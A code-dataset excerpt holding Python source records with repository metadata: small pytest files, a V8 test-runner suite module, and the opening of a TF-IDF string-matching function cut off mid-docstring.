hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f7fa18dacc1c9c0c60b03490e07fdafd357b7aad | 479 | py | Python | tests/test_my_module.py | sunxb05/pyworld | dfde82aefb74b614240e6bc138e2336fb6f102c8 | [
"Apache-2.0"
] | 1 | 2021-06-09T04:54:48.000Z | 2021-06-09T04:54:48.000Z | tests/test_my_module.py | sunxb05/pyworld | dfde82aefb74b614240e6bc138e2336fb6f102c8 | [
"Apache-2.0"
] | 5 | 2021-06-09T05:14:44.000Z | 2021-06-09T05:14:47.000Z | tests/test_my_module.py | sunxb05/pyworld | dfde82aefb74b614240e6bc138e2336fb6f102c8 | [
"Apache-2.0"
] | null | null | null | """Tests for the pyworld.my_module module.
"""
import pytest
from pyworld.my_module import hello
def test_hello():
    """hello() should greet a known name with the canonical format."""
    greeting = hello('nlesc')
    assert greeting == 'Hello nlesc!'
def test_hello_with_error():
    """hello() must refuse to greet 'nobody' with a ValueError."""
    # `match` does a regex search on str(exc); the literal has no
    # metacharacters, so this is equivalent to the substring check.
    with pytest.raises(ValueError, match='Can not say hello to nobody'):
        hello('nobody')
@pytest.fixture
def some_name():
    """Supply a sample full name for the greeting tests."""
    name = 'Jane Smith'
    return name
def test_hello_with_fixture(some_name):
    """hello() should greet whatever name the fixture provides."""
    expected = 'Hello Jane Smith!'
    assert hello(some_name) == expected
| 19.16 | 62 | 0.707724 | import pytest
from pyworld.my_module import hello
def test_hello():
assert hello('nlesc') == 'Hello nlesc!'
def test_hello_with_error():
with pytest.raises(ValueError) as excinfo:
hello('nobody')
assert 'Can not say hello to nobody' in str(excinfo.value)
@pytest.fixture
def some_name():
return 'Jane Smith'
def test_hello_with_fixture(some_name):
assert hello(some_name) == 'Hello Jane Smith!'
| true | true |
f7fa1955c4f00dd581986a39a8e91f56990e3f61 | 2,704 | py | Python | {{cookiecutter.project_directory_name}}/tests/test_logger_config.py | johnpneumann/cookiecutter-py | dc0110fcdeebd397c0ebde186cb5d2ffdef648d4 | [
"MIT"
] | 2 | 2017-01-19T05:59:46.000Z | 2019-01-19T06:44:23.000Z | {{cookiecutter.project_directory_name}}/tests/test_logger_config.py | johnpneumann/cookiecutter-py | dc0110fcdeebd397c0ebde186cb5d2ffdef648d4 | [
"MIT"
] | 4 | 2016-10-29T04:33:48.000Z | 2020-05-08T21:45:56.000Z | {{cookiecutter.project_directory_name}}/tests/test_logger_config.py | johnpneumann/cookiecutter-py | dc0110fcdeebd397c0ebde186cb5d2ffdef648d4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
tests.test_logger_config
~~~~~~~~~~~~~~~~~~~~~~~~
Tests the logger config.
:copyright: (c) {{ cookiecutter.copyright_year }} by {% if cookiecutter.project_owner == "" %}{{ cookiecutter.author_name }}{% else %}{{ cookiecutter.project_owner }}{% endif %}.
{%- if cookiecutter.open_source_license == 'Not open source' %}
"""
{%- else %}
{{ cookiecutter._license_strings[cookiecutter.open_source_license] }}
"""{% endif %}
{% if cookiecutter.use_file_logger == 'yes' %}
import os
import errno
{% endif -%}
import pytest
from mock import patch
from {{ cookiecutter.project_slug }} import logger_config
{% if cookiecutter.use_file_logger == 'yes' -%}
@patch('os.makedirs')
def test_logger_config_not_none(mock_makedirs, monkeypatch):
    """Ensure that the base call gets a valid logger config."""
    # Pin the home directory so the default log path is deterministic.
    monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
    mock_makedirs.return_value = True
    cfg = logger_config.get_logging_config()
    # Default log directory is <home>/pylogs/<project slug>.
    expected_logdir = '/tmp/pylogs/{{ cookiecutter.project_slug }}'
    mock_makedirs.assert_called_with(expected_logdir)
    assert isinstance(cfg, dict)
@patch('os.makedirs')
def test_logger_dir_from_environ(mock_makedirs, monkeypatch):
    """Ensure that the logger dir attempts to create the directory from the environment variable."""
    # The environment variable overrides the default home-based location.
    monkeypatch.setenv('{{ cookiecutter.file_logger_env_var_name }}', '/foo/bar/baz')
    mock_makedirs.return_value = True
    logger_config.get_logging_config()
    expected_logdir = '/foo/bar/baz'
    mock_makedirs.assert_called_with(expected_logdir)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_no_exist(mock_makedirs, mock_isdir, monkeypatch):
    """Ensure that we still get a dictionary back if we can't make the directory and it doesn't exist."""
    monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
    # Directory is absent AND creation fails outright.
    mock_isdir.return_value = False
    mock_makedirs.side_effect = OSError
    cfg = logger_config.get_logging_config()
    assert isinstance(cfg, dict)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_exist(mock_makedirs, mock_isdir, monkeypatch):
    """Ensure that we still get a dictionary back if makedirs fails because the directory already exists."""
    monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
    # Directory already exists: makedirs raises EEXIST, which must be tolerated.
    mock_isdir.return_value = True
    mock_makedirs.side_effect = OSError(errno.EEXIST)
    cfg = logger_config.get_logging_config()
    assert isinstance(cfg, dict)
{% else -%}
def test_logger_config_not_none():
    """Ensure that the base call gets a valid logger config."""
    # File logging disabled: no directory handling, just the config dict.
    cfg = logger_config.get_logging_config()
    assert isinstance(cfg, dict)
{% endif -%}
| 37.041096 | 182 | 0.715607 |
"""
tests.test_logger_config
~~~~~~~~~~~~~~~~~~~~~~~~
Tests the logger config.
:copyright: (c) {{ cookiecutter.copyright_year }} by {% if cookiecutter.project_owner == "" %}{{ cookiecutter.author_name }}{% else %}{{ cookiecutter.project_owner }}{% endif %}.
{%- if cookiecutter.open_source_license == 'Not open source' %}
"""
{%- else %}
{{ cookiecutter._license_strings[cookiecutter.open_source_license] }}
"""{% endif %}
{% if cookiecutter.use_file_logger == 'yes' %}
import os
import errno
{% endif -%}
import pytest
from mock import patch
from {{ cookiecutter.project_slug }} import logger_config
{% if cookiecutter.use_file_logger == 'yes' -%}
@patch('os.makedirs')
def test_logger_config_not_none(mock_makedirs, monkeypatch):
"""Ensure that the base call gets a valid logger config."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_makedirs.return_value = True
cfg = logger_config.get_logging_config()
expected_logdir = '/tmp/pylogs/{{ cookiecutter.project_slug }}'
mock_makedirs.assert_called_with(expected_logdir)
assert isinstance(cfg, dict)
@patch('os.makedirs')
def test_logger_dir_from_environ(mock_makedirs, monkeypatch):
"""Ensure that the logger dir attempts to create the directory from the environment variable."""
monkeypatch.setenv('{{ cookiecutter.file_logger_env_var_name }}', '/foo/bar/baz')
mock_makedirs.return_value = True
logger_config.get_logging_config()
expected_logdir = '/foo/bar/baz'
mock_makedirs.assert_called_with(expected_logdir)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_no_exist(mock_makedirs, mock_isdir, monkeypatch):
"""Ensure that we still get a dictionary back if we can't make the directory and it doesn't exist."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_isdir.return_value = False
mock_makedirs.side_effect = OSError
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
@patch('os.path.isdir')
@patch('os.makedirs')
def test_logger_oserror_exist(mock_makedirs, mock_isdir, monkeypatch):
"""Ensure that we still get a dictionary back if we can't make the directory and it doesn't exist."""
monkeypatch.setattr(os.path, 'expanduser', lambda x: '/tmp')
mock_isdir.return_value = True
mock_makedirs.side_effect = OSError(errno.EEXIST)
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
{% else -%}
def test_logger_config_not_none():
"""Ensure that the base call gets a valid logger config."""
cfg = logger_config.get_logging_config()
assert isinstance(cfg, dict)
{% endif -%}
| false | true |
f7fa19b20a0b5ce18abe0cd934fbbe12145291b8 | 12,313 | py | Python | tools/testrunner/local/testsuite.py | ADVAN-ELAA-8QM-PRC1/platform-external-v8 | d424a9e93b8e25ab0e3ac5aead27a5fac0795a1b | [
"BSD-3-Clause"
] | 27 | 2017-12-14T13:48:25.000Z | 2020-12-31T15:46:55.000Z | tools/testrunner/local/testsuite.py | ADVAN-ELAA-8QM-PRC1/platform-external-v8 | d424a9e93b8e25ab0e3ac5aead27a5fac0795a1b | [
"BSD-3-Clause"
] | 10 | 2016-09-30T14:57:49.000Z | 2017-06-30T12:56:01.000Z | tools/testrunner/local/testsuite.py | ADVAN-ELAA-8QM-PRC1/platform-external-v8 | d424a9e93b8e25ab0e3ac5aead27a5fac0795a1b | [
"BSD-3-Clause"
] | 23 | 2016-08-03T17:43:32.000Z | 2021-03-04T17:09:00.000Z | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
from variants import ALL_VARIANTS, ALL_VARIANT_FLAGS, FAST_VARIANT_FLAGS
FAST_VARIANTS = set(["default", "turbofan"])
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
  """Decides which testing variants (and flag sets) apply to a test case."""

  def __init__(self, suite, variants):
    self.suite = suite
    # Intersect the requested variants with what each category supports.
    self.all_variants = ALL_VARIANTS & variants
    self.fast_variants = FAST_VARIANTS & variants
    self.standard_variant = STANDARD_VARIANT & variants

  def FilterVariantsByTest(self, testcase):
    """Return the variant set permitted by the test's status-file outcomes."""
    outcomes = testcase.outcomes
    if outcomes:
      if statusfile.OnlyStandardVariant(outcomes):
        return self.standard_variant
      if statusfile.OnlyFastVariants(outcomes):
        return self.fast_variants
    return self.all_variants

  def GetFlagSets(self, testcase, variant):
    """Return the flag sets for `variant`, using the fast set when required."""
    fast_only = testcase.outcomes and statusfile.OnlyFastVariants(testcase.outcomes)
    if fast_only:
      return FAST_VARIANT_FLAGS[variant]
    return ALL_VARIANT_FLAGS[variant]
class TestSuite(object):
  """Base class for a collection of tests plus their status-file rules.

  Concrete suites provide a testcfg.py with a GetSuite() factory; suites
  without one fall back to GoogleTestSuite (see LoadTestSuite).
  """

  @staticmethod
  def LoadTestSuite(root, global_init=True):
    """Instantiate the suite living at `root` via its testcfg module."""
    name = root.split(os.path.sep)[-1]
    f = None
    try:
      (f, pathname, description) = imp.find_module("testcfg", [root])
      module = imp.load_module("testcfg", f, pathname, description)
      return module.GetSuite(name, root)
    except ImportError:
      # Use default if no testcfg is present.
      return GoogleTestSuite(name, root)
    finally:
      if f:
        f.close()

  def __init__(self, name, root):
    # Note: This might be called concurrently from different processes.
    self.name = name  # string
    self.root = root  # string containing path
    self.tests = None  # list of TestCase objects
    self.rules = None  # dictionary mapping test path to list of outcomes
    self.wildcards = None  # dictionary mapping test paths to list of outcomes
    self.total_duration = None  # float, assigned on demand

  def shell(self):
    # Executable used to run this suite's tests; overridden by subclasses.
    return "d8"

  def suffix(self):
    return ".js"

  def status_file(self):
    return "%s/%s.status" % (self.root, self.name)

  # Used in the status file and for stdout printing.
  def CommonTestName(self, testcase):
    if utils.IsWindows():
      # Normalize path separators so status-file rules match across platforms.
      return testcase.path.replace("\\", "/")
    else:
      return testcase.path

  def ListTests(self, context):
    # Subclasses must discover and return their TestCase objects.
    raise NotImplementedError

  def _VariantGeneratorFactory(self):
    """The variant generator class to be used."""
    return VariantGenerator

  def CreateVariantGenerator(self, variants):
    """Return a generator for the testing variants of this suite.

    Args:
      variants: List of variant names to be run as specified by the test
                runner.
    Returns: An object of type VariantGenerator.
    """
    return self._VariantGeneratorFactory()(self, set(variants))

  def PrepareSources(self):
    """Called once before multiprocessing for doing file-system operations.

    This should not access the network. For network access use the method
    below.
    """
    pass

  def DownloadData(self):
    pass

  def ReadStatusFile(self, variables):
    """Parse this suite's .status file into `rules` and `wildcards`."""
    with open(self.status_file()) as f:
      self.rules, self.wildcards = (
          statusfile.ReadStatusFile(f.read(), variables))

  def ReadTestCases(self, context):
    self.tests = self.ListTests(context)

  @staticmethod
  def _FilterSlow(slow, mode):
    # True when the test should be dropped under the given slow-test mode.
    return (mode == "run" and not slow) or (mode == "skip" and slow)

  @staticmethod
  def _FilterPassFail(pass_fail, mode):
    return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)

  def FilterTestCasesByStatus(self, warn_unused_rules,
                              slow_tests="dontcare",
                              pass_fail_tests="dontcare",
                              variants=False):
    """Drop tests the status file skips; optionally report unused rules."""
    # Use only variants-dependent rules and wildcards when filtering
    # respective test cases and generic rules when filtering generic test
    # cases.
    if not variants:
      rules = self.rules[""]
      wildcards = self.wildcards[""]
    else:
      # We set rules and wildcards to a variant-specific version for each test
      # below.
      rules = {}
      wildcards = {}
    filtered = []
    # Remember used rules as tuples of (rule, variant), where variant is "" for
    # variant-independent rules.
    used_rules = set()
    for t in self.tests:
      slow = False
      pass_fail = False
      testname = self.CommonTestName(t)
      variant = t.variant or ""
      if variants:
        rules = self.rules[variant]
        wildcards = self.wildcards[variant]
      if testname in rules:
        used_rules.add((testname, variant))
        # Even for skipped tests, as the TestCase object stays around and
        # PrintReport() uses it.
        t.outcomes = t.outcomes | rules[testname]
        if statusfile.DoSkip(t.outcomes):
          continue  # Don't add skipped tests to |filtered|.
        for outcome in t.outcomes:
          if outcome.startswith('Flags: '):
            t.flags += outcome[7:].split()
        slow = statusfile.IsSlow(t.outcomes)
        pass_fail = statusfile.IsPassOrFail(t.outcomes)
      skip = False
      for rule in wildcards:
        assert rule[-1] == '*'
        if testname.startswith(rule[:-1]):
          used_rules.add((rule, variant))
          t.outcomes = t.outcomes | wildcards[rule]
          if statusfile.DoSkip(t.outcomes):
            skip = True
            break  # "for rule in wildcards"
          slow = slow or statusfile.IsSlow(t.outcomes)
          pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
      if (skip
          or self._FilterSlow(slow, slow_tests)
          or self._FilterPassFail(pass_fail, pass_fail_tests)):
        continue  # "for t in self.tests"
      filtered.append(t)
    self.tests = filtered
    if not warn_unused_rules:
      return
    # Report status-file entries that matched no test.
    if not variants:
      for rule in self.rules[""]:
        if (rule, "") not in used_rules:
          print("Unused rule: %s -> %s (variant independent)" % (
              rule, self.rules[""][rule]))
      for rule in self.wildcards[""]:
        if (rule, "") not in used_rules:
          print("Unused rule: %s -> %s (variant independent)" % (
              rule, self.wildcards[""][rule]))
    else:
      for variant in ALL_VARIANTS:
        for rule in self.rules[variant]:
          if (rule, variant) not in used_rules:
            print("Unused rule: %s -> %s (variant: %s)" % (
                rule, self.rules[variant][rule], variant))
        for rule in self.wildcards[variant]:
          if (rule, variant) not in used_rules:
            print("Unused rule: %s -> %s (variant: %s)" % (
                rule, self.wildcards[variant][rule], variant))

  def FilterTestCasesByArgs(self, args):
    """Filter test cases based on command-line arguments.

    An argument with an asterisk in the end will match all test cases
    that have the argument as a prefix. Without asterisk, only exact matches
    will be used with the exception of the test-suite name as argument.
    """
    filtered = []
    globs = []
    exact_matches = []
    for a in args:
      argpath = a.split('/')
      if argpath[0] != self.name:
        continue
      if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
        return  # Don't filter, run all tests in this suite.
      path = '/'.join(argpath[1:])
      if path[-1] == '*':
        path = path[:-1]
        globs.append(path)
      else:
        exact_matches.append(path)
    for t in self.tests:
      for a in globs:
        if t.path.startswith(a):
          filtered.append(t)
          break
      for a in exact_matches:
        if t.path == a:
          filtered.append(t)
          break
    self.tests = filtered

  def GetFlagsForTestCase(self, testcase, context):
    # Subclasses build the command-line flags for one test case.
    raise NotImplementedError

  def GetSourceForTest(self, testcase):
    return "(no source available)"

  def IsFailureOutput(self, testcase):
    return testcase.output.exit_code != 0

  def IsNegativeTest(self, testcase):
    # Negative tests are expected to fail; subclasses may override.
    return False

  def HasFailed(self, testcase):
    execution_failed = self.IsFailureOutput(testcase)
    if self.IsNegativeTest(testcase):
      return not execution_failed
    else:
      return execution_failed

  def GetOutcome(self, testcase):
    """Map a finished test case to one of the statusfile outcome constants."""
    if testcase.output.HasCrashed():
      return statusfile.CRASH
    elif testcase.output.HasTimedOut():
      return statusfile.TIMEOUT
    elif self.HasFailed(testcase):
      return statusfile.FAIL
    else:
      return statusfile.PASS

  def HasUnexpectedOutput(self, testcase):
    outcome = self.GetOutcome(testcase)
    # A test without explicit outcomes is expected to PASS.
    return not outcome in (testcase.outcomes or [statusfile.PASS])

  def StripOutputForTransmit(self, testcase):
    # Drop bulky stdout/stderr for expected results before transmitting.
    if not self.HasUnexpectedOutput(testcase):
      testcase.output.stdout = ""
      testcase.output.stderr = ""

  def CalculateTotalDuration(self):
    """Sum and cache the durations of all tests in this suite."""
    self.total_duration = 0.0
    for t in self.tests:
      self.total_duration += t.duration
    return self.total_duration
class StandardVariantGenerator(VariantGenerator):
  """Variant generator that always selects only the standard variant."""

  def FilterVariantsByTest(self, testcase):
    # Ignore status-file variant hints; used by GoogleTestSuite below.
    return self.standard_variant
class GoogleTestSuite(TestSuite):
  """Default suite for GTest-based executables (used when no testcfg exists).

  The shell binary carries the suite's own name and is queried with
  --gtest_list_tests to discover individual test cases.
  """

  def __init__(self, name, root):
    super(GoogleTestSuite, self).__init__(name, root)

  def ListTests(self, context):
    """Run the gtest binary with --gtest_list_tests and parse its output."""
    shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
    if utils.IsWindows():
      shell += ".exe"
    output = None
    for i in xrange(3):  # Try 3 times in case of errors.
      output = commands.Execute(context.command_prefix +
                                [shell, "--gtest_list_tests"] +
                                context.extra_flags)
      if output.exit_code == 0:
        break
      print "Test executable failed to list the tests (try %d).\n\nStdout:" % i
      print output.stdout
      print "\nStderr:"
      print output.stderr
      print "\nExit code: %d" % output.exit_code
    else:
      # for/else: all three attempts failed.
      raise Exception("Test executable failed to list the tests.")
    tests = []
    test_case = ''
    # gtest prints "CaseName." lines followed by the test names of that case.
    for line in output.stdout.splitlines():
      test_desc = line.strip().split()[0]
      if test_desc.endswith('.'):
        test_case = test_desc
      elif test_case and test_desc:
        test = testcase.TestCase(self, test_case + test_desc)
        tests.append(test)
    tests.sort(key=lambda t: t.path)
    return tests

  def GetFlagsForTestCase(self, testcase, context):
    # --gtest_filter selects exactly one test; the fixed seed keeps runs
    # reproducible across workers.
    return (testcase.flags + ["--gtest_filter=" + testcase.path] +
            ["--gtest_random_seed=%s" % context.random_seed] +
            ["--gtest_print_time=0"] +
            context.mode_flags)

  def _VariantGeneratorFactory(self):
    return StandardVariantGenerator

  def shell(self):
    # The shell binary is named after the suite itself.
    return self.name
| 33.550409 | 79 | 0.659222 |
import imp
import os
from . import commands
from . import statusfile
from . import utils
from ..objects import testcase
from variants import ALL_VARIANTS, ALL_VARIANT_FLAGS, FAST_VARIANT_FLAGS
FAST_VARIANTS = set(["default", "turbofan"])
STANDARD_VARIANT = set(["default"])
class VariantGenerator(object):
def __init__(self, suite, variants):
self.suite = suite
self.all_variants = ALL_VARIANTS & variants
self.fast_variants = FAST_VARIANTS & variants
self.standard_variant = STANDARD_VARIANT & variants
def FilterVariantsByTest(self, testcase):
result = self.all_variants
if testcase.outcomes:
if statusfile.OnlyStandardVariant(testcase.outcomes):
return self.standard_variant
if statusfile.OnlyFastVariants(testcase.outcomes):
result = self.fast_variants
return result
def GetFlagSets(self, testcase, variant):
if testcase.outcomes and statusfile.OnlyFastVariants(testcase.outcomes):
return FAST_VARIANT_FLAGS[variant]
else:
return ALL_VARIANT_FLAGS[variant]
class TestSuite(object):
@staticmethod
def LoadTestSuite(root, global_init=True):
name = root.split(os.path.sep)[-1]
f = None
try:
(f, pathname, description) = imp.find_module("testcfg", [root])
module = imp.load_module("testcfg", f, pathname, description)
return module.GetSuite(name, root)
except ImportError:
return GoogleTestSuite(name, root)
finally:
if f:
f.close()
def __init__(self, name, root):
self.name = name
self.root = root
self.tests = None
self.rules = None
self.wildcards = None
self.total_duration = None
def shell(self):
return "d8"
def suffix(self):
return ".js"
def status_file(self):
return "%s/%s.status" % (self.root, self.name)
def CommonTestName(self, testcase):
if utils.IsWindows():
return testcase.path.replace("\\", "/")
else:
return testcase.path
def ListTests(self, context):
raise NotImplementedError
def _VariantGeneratorFactory(self):
"""The variant generator class to be used."""
return VariantGenerator
def CreateVariantGenerator(self, variants):
"""Return a generator for the testing variants of this suite.
Args:
variants: List of variant names to be run as specified by the test
runner.
Returns: An object of type VariantGenerator.
"""
return self._VariantGeneratorFactory()(self, set(variants))
def PrepareSources(self):
"""Called once before multiprocessing for doing file-system operations.
This should not access the network. For network access use the method
below.
"""
pass
def DownloadData(self):
pass
def ReadStatusFile(self, variables):
with open(self.status_file()) as f:
self.rules, self.wildcards = (
statusfile.ReadStatusFile(f.read(), variables))
def ReadTestCases(self, context):
self.tests = self.ListTests(context)
@staticmethod
def _FilterSlow(slow, mode):
return (mode == "run" and not slow) or (mode == "skip" and slow)
@staticmethod
def _FilterPassFail(pass_fail, mode):
return (mode == "run" and not pass_fail) or (mode == "skip" and pass_fail)
def FilterTestCasesByStatus(self, warn_unused_rules,
slow_tests="dontcare",
pass_fail_tests="dontcare",
variants=False):
if not variants:
rules = self.rules[""]
wildcards = self.wildcards[""]
else:
rules = {}
wildcards = {}
filtered = []
used_rules = set()
for t in self.tests:
slow = False
pass_fail = False
testname = self.CommonTestName(t)
variant = t.variant or ""
if variants:
rules = self.rules[variant]
wildcards = self.wildcards[variant]
if testname in rules:
used_rules.add((testname, variant))
t.outcomes = t.outcomes | rules[testname]
if statusfile.DoSkip(t.outcomes):
continue
for outcome in t.outcomes:
if outcome.startswith('Flags: '):
t.flags += outcome[7:].split()
slow = statusfile.IsSlow(t.outcomes)
pass_fail = statusfile.IsPassOrFail(t.outcomes)
skip = False
for rule in wildcards:
assert rule[-1] == '*'
if testname.startswith(rule[:-1]):
used_rules.add((rule, variant))
t.outcomes = t.outcomes | wildcards[rule]
if statusfile.DoSkip(t.outcomes):
skip = True
break # "for rule in wildcards"
slow = slow or statusfile.IsSlow(t.outcomes)
pass_fail = pass_fail or statusfile.IsPassOrFail(t.outcomes)
if (skip
or self._FilterSlow(slow, slow_tests)
or self._FilterPassFail(pass_fail, pass_fail_tests)):
continue # "for t in self.tests"
filtered.append(t)
self.tests = filtered
if not warn_unused_rules:
return
if not variants:
for rule in self.rules[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.rules[""][rule]))
for rule in self.wildcards[""]:
if (rule, "") not in used_rules:
print("Unused rule: %s -> %s (variant independent)" % (
rule, self.wildcards[""][rule]))
else:
for variant in ALL_VARIANTS:
for rule in self.rules[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.rules[variant][rule], variant))
for rule in self.wildcards[variant]:
if (rule, variant) not in used_rules:
print("Unused rule: %s -> %s (variant: %s)" % (
rule, self.wildcards[variant][rule], variant))
def FilterTestCasesByArgs(self, args):
"""Filter test cases based on command-line arguments.
An argument with an asterisk in the end will match all test cases
that have the argument as a prefix. Without asterisk, only exact matches
will be used with the exeption of the test-suite name as argument.
"""
filtered = []
globs = []
exact_matches = []
for a in args:
argpath = a.split('/')
if argpath[0] != self.name:
continue
if len(argpath) == 1 or (len(argpath) == 2 and argpath[1] == '*'):
return # Don't filter, run all tests in this suite.
path = '/'.join(argpath[1:])
if path[-1] == '*':
path = path[:-1]
globs.append(path)
else:
exact_matches.append(path)
for t in self.tests:
for a in globs:
if t.path.startswith(a):
filtered.append(t)
break
for a in exact_matches:
if t.path == a:
filtered.append(t)
break
self.tests = filtered
def GetFlagsForTestCase(self, testcase, context):
raise NotImplementedError
def GetSourceForTest(self, testcase):
return "(no source available)"
def IsFailureOutput(self, testcase):
return testcase.output.exit_code != 0
def IsNegativeTest(self, testcase):
return False
def HasFailed(self, testcase):
execution_failed = self.IsFailureOutput(testcase)
if self.IsNegativeTest(testcase):
return not execution_failed
else:
return execution_failed
def GetOutcome(self, testcase):
if testcase.output.HasCrashed():
return statusfile.CRASH
elif testcase.output.HasTimedOut():
return statusfile.TIMEOUT
elif self.HasFailed(testcase):
return statusfile.FAIL
else:
return statusfile.PASS
def HasUnexpectedOutput(self, testcase):
outcome = self.GetOutcome(testcase)
return not outcome in (testcase.outcomes or [statusfile.PASS])
def StripOutputForTransmit(self, testcase):
if not self.HasUnexpectedOutput(testcase):
testcase.output.stdout = ""
testcase.output.stderr = ""
def CalculateTotalDuration(self):
self.total_duration = 0.0
for t in self.tests:
self.total_duration += t.duration
return self.total_duration
class StandardVariantGenerator(VariantGenerator):
def FilterVariantsByTest(self, testcase):
return self.standard_variant
class GoogleTestSuite(TestSuite):
def __init__(self, name, root):
super(GoogleTestSuite, self).__init__(name, root)
def ListTests(self, context):
shell = os.path.abspath(os.path.join(context.shell_dir, self.shell()))
if utils.IsWindows():
shell += ".exe"
output = None
for i in xrange(3):
output = commands.Execute(context.command_prefix +
[shell, "--gtest_list_tests"] +
context.extra_flags)
if output.exit_code == 0:
break
print "Test executable failed to list the tests (try %d).\n\nStdout:" % i
print output.stdout
print "\nStderr:"
print output.stderr
print "\nExit code: %d" % output.exit_code
else:
raise Exception("Test executable failed to list the tests.")
tests = []
test_case = ''
for line in output.stdout.splitlines():
test_desc = line.strip().split()[0]
if test_desc.endswith('.'):
test_case = test_desc
elif test_case and test_desc:
test = testcase.TestCase(self, test_case + test_desc)
tests.append(test)
tests.sort(key=lambda t: t.path)
return tests
def GetFlagsForTestCase(self, testcase, context):
return (testcase.flags + ["--gtest_filter=" + testcase.path] +
["--gtest_random_seed=%s" % context.random_seed] +
["--gtest_print_time=0"] +
context.mode_flags)
def _VariantGeneratorFactory(self):
return StandardVariantGenerator
def shell(self):
return self.name
| false | true |
f7fa1a074af2265b09ac4db94b81f190e7723a36 | 4,353 | py | Python | tfidf_matcher/matcher.py | LouisTsiattalou/tfidf_matcher | e95139f16329d149a2a3c1002d5b9bfe6da3b116 | [
"MIT"
] | 13 | 2020-02-24T18:29:15.000Z | 2021-12-28T09:41:35.000Z | tfidf_matcher/matcher.py | LouisTsiattalou/tfidf_matcher | e95139f16329d149a2a3c1002d5b9bfe6da3b116 | [
"MIT"
] | null | null | null | tfidf_matcher/matcher.py | LouisTsiattalou/tfidf_matcher | e95139f16329d149a2a3c1002d5b9bfe6da3b116 | [
"MIT"
] | 3 | 2020-07-21T04:32:45.000Z | 2021-10-21T11:00:56.000Z | # AUTHOR: Louis Tsiattalou
# DESCRIPTION: Match list items to closest tf-idf match in second list.
import pandas as pd
from tfidf_matcher.ngrams import ngrams
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.neighbors import NearestNeighbors
def matcher(original=(), lookup=(), k_matches=5, ngram_length=3):
    """Takes two lists, returns top `k` matches from `lookup` dataset.

    This function does this by:
    - Splitting the `lookup` list into ngrams.
    - Transforming the resulting ngram list into a TF-IDF Sparse Matrix.
    - Fit a NearestNeighbours Model to the matrix using the lookup data.
    - Transform the `original` list into a TF-IDF Sparse Matrix.
    - Calculates distances to all the `n-matches` nearest neighbours
    - Then extract the `original`, `n-matches` closest lookups, and calculate
      a match score (abs(1 - Distance to Nearest Neighbour))

